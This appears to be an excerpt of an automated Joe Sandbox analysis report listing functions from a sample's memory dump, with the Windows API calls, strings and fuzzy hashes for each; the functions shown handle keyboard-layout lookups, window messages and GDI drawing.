Instruction ID: 66b5de79dae58c3d3a842c9a460ed0f30af0b11845e1d1d19718413b6424f91b
Opcode Fuzzy Hash: 3aae614af262af35c5a02a92f2142531e1f2dc6eff0cbb2fb5699dfebaccaf0a
Instruction Fuzzy Hash: F251F575E40218AFDB04DBE8DD91FAEB7B9FB88700F148459E900EB395DB74AD058B50

Uniqueness

Uniqueness Score: -1.00%

Function 02A219D8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,02A21B83,?,2113D9D0,?,02A21BE5,00000000,?,02A0D22F), ref: 02A21A2E
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 02A21A96
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,02A21B3F,?,80000002,00000000), ref: 02A21AD0
RegCloseKey.ADVAPI32(?,02A21B46,00000000,?,00000100,00000000,02A21B3F,?,80000002,00000000), ref: 02A21B39

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 02A21A80
layout text, xrefs: 02A21AC7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: f3ff36fdcac84be1eacba5adacfd77e4178fd8617626384475258e0e5af2ceb5
Instruction ID: 77e51eb5444ce1f0dfa73f34461e3be5814c2f9cc3e3a5597e5178b9e966af2a
Opcode Fuzzy Hash: f3ff36fdcac84be1eacba5adacfd77e4178fd8617626384475258e0e5af2ceb5
Instruction Fuzzy Hash: 1A412A74A00259AFEB11DF58C980BDEB7F9FB48700F5184E1E908E7251EB70AE449F61

Uniqueness

Uniqueness Score: -1.00%

Function 02A23DEC Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 02A23E00
IsWindowUnicode.USER32 ref: 02A23E14
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02A23E35
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 02A23E4B
TranslateMessage.USER32 ref: 02A23ED4
DispatchMessageW.USER32 ref: 02A23EE0
DispatchMessageA.USER32 ref: 02A23EE8

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction ID: ddda14528a7027ef715d58eb578ba931d65dd06584981994c43e054e24ea7437
Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction Fuzzy Hash: 6621F62074836067EE317B2C4D81BBF92DA4F93B48F1484D9E98197182DFEE944E8E12

Uniqueness

Uniqueness Score: -1.00%

Function 02A1D0F0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 02A1D161
GetWindowLongA.USER32(00000000,000000EC), ref: 02A1D173
GetClassLongA.USER32(00000000,000000E6), ref: 02A1D186
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02A1D1C6
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02A1D1DA
SetClassLongA.USER32(00000000,000000E6,?), ref: 02A1D1EE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 02A1D20A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction ID: e9425bc0438212106aaecbbab04d802ededc2c5a15d56e637b0831c3af81eece
Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction Fuzzy Hash: C421D53430868166CA05A77C8D84AFEF79B5FC1328F188656F4A4972D0CF74D845DB52

Uniqueness

Uniqueness Score: -1.00%

Function 02A21D24 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 02A21D79
CreateFontIndirectA.GDI32(?), ref: 02A21D86
GetStockObject.GDI32(0000000D), ref: 02A21D9C

Part of subcall function 029F2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 029F2525

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 02A21DC5
CreateFontIndirectA.GDI32(?), ref: 02A21DD5
CreateFontIndirectA.GDI32(?), ref: 02A21DEE
GetStockObject.GDI32(0000000D), ref: 02A21E14

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 39080a7089ab3cf22950cb2489dc974b134851296e23ccc05a439607c726b1f2
Instruction ID: 82e5a6e011f74d3b200ee4867e1e0891b27ee99ca8f6a5630035b55bad705b81
Opcode Fuzzy Hash: 39080a7089ab3cf22950cb2489dc974b134851296e23ccc05a439607c726b1f2
Instruction Fuzzy Hash: A131A430B452549BEB94EB68DC94B9933F9EB84300F8584B0AE4CDB286DF749909DF21

Uniqueness

Uniqueness Score: -1.00%

Function 02A26C70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 029DC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,029DC9F2), ref: 029DC95E
Part of subcall function 029DC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,029DC9D5,?,00000000,?,00000000,029DC9F2), ref: 029DC993
Part of subcall function 029DC91C: VerQueryValueA.VERSION(?,029DCA04,?,?,00000000,?,00000000,?,00000000,029DC9D5,?,00000000,?,00000000,029DC9F2), ref: 029DC9AD

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 02A26CA4
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 02A26CB5
ImageList_Write.COMCTL32(00000000,?,00000000,02A26D6A), ref: 02A26D34

Strings

comctl32.dll, xrefs: 02A26C84
comctl32.dll, xrefs: 02A26C9F
ImageList_WriteEx, xrefs: 02A26CAF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 4063495462-3125200627
Opcode ID: 1ec27bfa369c743f400a784621cb40f8bbe479b63a0756a61cbd54442cd939cc
Instruction ID: 8e7e1354861e13258d946f0c2389c006401763d24c985ca0e3b13af52c5ea9a4
Opcode Fuzzy Hash: 1ec27bfa369c743f400a784621cb40f8bbe479b63a0756a61cbd54442cd939cc
Instruction Fuzzy Hash: BE21A430745B54ABE714BB7ED894B2A37BEEB84B09B405428E901E7251DF75E808DE10

Uniqueness

Uniqueness Score: -1.00%

Function 02A03008 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(00000000), ref: 02A03030

Part of subcall function 029F02A4: RegCloseKey.ADVAPI32(10940000,029F0180,00000001,029F0222,?,?,029F76BA,00000008,00000060,00000048,00000000,029F775F), ref: 029F02B8

Part of subcall function 029F0308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F0374

Part of subcall function 029DDC04: SetErrorMode.KERNEL32 ref: 029DDC0E
Part of subcall function 029DDC04: LoadLibraryA.KERNEL32(00000000,00000000,029DDC58,?,00000000,029DDC76), ref: 029DDC3D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 02A030C1
FreeLibrary.KERNEL32(?,02A030FB,?,00000000,02A0313B), ref: 02A030EE

Strings

\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 02A03075
KbdLayerDescriptor, xrefs: 02A030B8
Layout File, xrefs: 02A0308D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3365787578-2194312379
Opcode ID: b3c23ce7a467b0361a4af07a37e5e3014da30422e39de74693dcd45aedcc1419
Instruction ID: b5e69f725b9770fc443328d7c6c950c0718e57fffd5747e52c032dde888298eb
Opcode Fuzzy Hash: b3c23ce7a467b0361a4af07a37e5e3014da30422e39de74693dcd45aedcc1419
Instruction Fuzzy Hash: 1121BD70E04249AFDF41EFA4D8919EEF7BAFB89300F4088A4E500A7640DB39A915DF60

Uniqueness

Uniqueness Score: -1.00%

Function 029FB0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB0FC
GetSystemMetrics.USER32(00000000), ref: 029FB111
GetSystemMetrics.USER32(00000001), ref: 029FB11C
lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB146

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

GetMonitorInfoA, xrefs: 029FB0BC
DISPLAY, xrefs: 029FB13D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: b02946b3d520ef2a53d3d86cf37fb5c9249c5bde5b693c64affae9ac110014e3
Instruction ID: 73d7525383647631f9af74fc773e537b75dabdf67a33b795419864579a4d7f62
Opcode Fuzzy Hash: b02946b3d520ef2a53d3d86cf37fb5c9249c5bde5b693c64affae9ac110014e3
Instruction Fuzzy Hash: C4110331B40708DFD7A0CF64DC587A7B7E9EB4A758F104929EE1597280D770A840CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029FB178 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB1D0
GetSystemMetrics.USER32(00000000), ref: 029FB1E5
GetSystemMetrics.USER32(00000001), ref: 029FB1F0
lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB21A

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

GetMonitorInfoW, xrefs: 029FB190
DISPLAY, xrefs: 029FB211

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 7e08d9feb587eb76296da63ef0f43ee39647e690ffd914853fbcbc30cd093062
Instruction ID: 3b27105c2f45ad46d8fd705999c8ce9954206475e826c2bade929796b9354b53
Opcode Fuzzy Hash: 7e08d9feb587eb76296da63ef0f43ee39647e690ffd914853fbcbc30cd093062
Instruction Fuzzy Hash: 9011D331A407019FE7A0CFA4EC58BFBB7E9EB59715F004929EE55E7241D770A405CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029F4E74 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 029F3C9C: GetObjectA.GDI32(?,00000004), ref: 029F3CB3
Part of subcall function 029F3C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 029F3CD6

GetDC.USER32(00000000), ref: 029F4EB2
CreateCompatibleDC.GDI32(?), ref: 029F4EBE
SelectObject.GDI32(?), ref: 029F4ECB
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,029F4F23,?,?,?,?,00000000), ref: 029F4EEF
SelectObject.GDI32(?,?), ref: 029F4F09
DeleteDC.GDI32(?), ref: 029F4F12
ReleaseDC.USER32(00000000,?), ref: 029F4F1D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 517821aec44e192d6abf16e21f986b448b36a2be3369a3a31281405b353759a7
Instruction ID: c97996b174035e6401a245136faa4217b9f6a6d0b6eda3a7efcf0d0cc111b3e0
Opcode Fuzzy Hash: 517821aec44e192d6abf16e21f986b448b36a2be3369a3a31281405b353759a7
Instruction Fuzzy Hash: 17113372E04249ABDB50EFE8DC50AAEB7BDEB88700F4184B5F708D7240D7759A409B60

Uniqueness

Uniqueness Score: -1.00%

Function 02A21C88 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 02A21CA3
WindowFromPoint.USER32(?,?), ref: 02A21CB0
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02A21CBE
GetCurrentThreadId.KERNEL32 ref: 02A21CC5
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 02A21CEE
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 02A21D00
SetCursor.USER32(00000000), ref: 02A21D12

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction ID: 0404f3b872fdf192a3a75d2e97b7b8ec467ea1e0cd0d2ca0d544a13d534e8f8c
Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction Fuzzy Hash: 0501B5251043A0B5C7216BA88DC0F7FB6A9DFC1B55F10855AFAC89A191EB25DC04E726

Uniqueness

Uniqueness Score: -1.00%

Function 029DBFC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 029DBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
Part of subcall function 029DBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
Part of subcall function 029DBE3C: GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
Part of subcall function 029DBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E

CharToOemA.USER32(?,?), ref: 029DBFFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029DC018
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC01E
GetStdHandle.KERNEL32(000000F4,029DC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC033
WriteFile.KERNEL32(00000000,000000F4,029DC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC039
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029DC05B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 029DC071

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 48930eaee96cf707baaadabd5c0deb6a5188e2885c3af6aa9b95758ca3495fe3
Instruction ID: a445271fcfaac2965de9e4e5e934ffff82ac63a9558953194b735b5ee7c49d3f
Opcode Fuzzy Hash: 48930eaee96cf707baaadabd5c0deb6a5188e2885c3af6aa9b95758ca3495fe3
Instruction Fuzzy Hash: 30115EB2548200BAD600FBA4DC84F9B77EEAB85700F808A1AB754D71D1DB35D905AF72

Uniqueness

Uniqueness Score: -1.00%

Function 02A1CA6C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 02A1CAE5
GetClientRect.USER32(00000000,?), ref: 02A1CB10
FillRect.USER32(?,?,00000000), ref: 02A1CB2F

Part of subcall function 02A1C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 02A1CA1A

BeginPaint.USER32(?,?), ref: 02A1CBA7
GetWindowRect.USER32(?,?), ref: 02A1CBD4
EndPaint.USER32(?,?,02A1CC48), ref: 02A1CC34

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: fad91948685d8604bdc544dced004dbbdfb50b05d717b117eb10e07bef2a2e01
Instruction ID: f6e98406d05c2c01a1599464e98ae0b61dd3dafc121b2ab9bf66bd27ead5e7a7
Opcode Fuzzy Hash: fad91948685d8604bdc544dced004dbbdfb50b05d717b117eb10e07bef2a2e01
Instruction Fuzzy Hash: 8351ED75A44208EFCB10DBA8C588E9DB7FAAF49330F1481A5E509EB261DB34AE45DF05

Uniqueness

Uniqueness Score: -1.00%

Function 029DF8F8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029DF991
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029DF9AD
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029DF9E6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029DFA63
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029DFA7C
VariantCopy.OLEAUT32(?,00000000), ref: 029DFAB1

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: cfbef3160629cfcdfd51e8967086049047c6181907887967ff2bd9fea4b7c22f
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 9A51E9B59006299BCB22EF58CC91BD9B3FDAF48340F0081D5E54AE7611D734AF849F65

Uniqueness

Uniqueness Score: -1.00%

Function 029ED6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 029ED6EF
GetCurrentThreadId.KERNEL32 ref: 029ED6FE

Part of subcall function 029ED6BC: ResetEvent.KERNEL32(000002D4,029ED739), ref: 029ED6C2

EnterCriticalSection.KERNEL32(02A6A2EC), ref: 029ED743
InterlockedExchange.KERNEL32(02A3AAF0,?), ref: 029ED75F
LeaveCriticalSection.KERNEL32(02A6A2EC,00000000,029ED88A,?,00000000,029ED8A9,?,02A6A2EC), ref: 029ED7B8
EnterCriticalSection.KERNEL32(02A6A2EC,029ED834,029ED88A,?,00000000,029ED8A9,?,02A6A2EC), ref: 029ED827

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: bd53ed9f45182ebcb0166aac18f2a05136882320fbb2746a67b4ef329e3b8ae8
Instruction ID: 2b0dcef3a8d9d5fa4ef284155d296c570a33968f6667893ad5b70145f450ca97
Opcode Fuzzy Hash: bd53ed9f45182ebcb0166aac18f2a05136882320fbb2746a67b4ef329e3b8ae8
Instruction Fuzzy Hash: 0431C074A04644AFEB02DFA8D851A69B7FDEB89B00F52C8B5E402D2650D7769940DE31

Uniqueness

Uniqueness Score: -1.00%

Function 029F3F4C Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 029F3F9A
GetSystemMetrics.USER32(0000000C), ref: 029F3FA6
GetDC.USER32(00000000), ref: 029F3FC2
GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F3FE9
GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F3FF6
ReleaseDC.USER32(00000000,00000000), ref: 029F402F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 8815c8232b950d692c96111b6370d77ffa7ad65a51e1855f9ca68a65d17b76ff
Instruction ID: b4c30d3c06dc3dc745655d6e821cd2108c3f51ae23db589287bbef1f654156a2
Opcode Fuzzy Hash: 8815c8232b950d692c96111b6370d77ffa7ad65a51e1855f9ca68a65d17b76ff
Instruction Fuzzy Hash: 81315070A00244EFEB50DFA4C880AAEBBB5FF89310F14C565EA14AB794D735AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 029F43AC Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 029F4258: GetObjectA.GDI32(?,00000054), ref: 029F426C

CreateCompatibleDC.GDI32(00000000), ref: 029F43CE
SelectPalette.GDI32(?,?,00000000), ref: 029F43EF
RealizePalette.GDI32(?), ref: 029F43FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 029F4412
SelectPalette.GDI32(?,00000000,00000000), ref: 029F443A
DeleteDC.GDI32(?), ref: 029F4443

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: e162fbab7d511354293cb40899661c7c51ffbef0cfcd9572b87e74d86ff7d628
Instruction ID: 25e2d50d169ad2534f9a07a1044c848b013cf9f6a046fce49273d54dc2dbaa3f
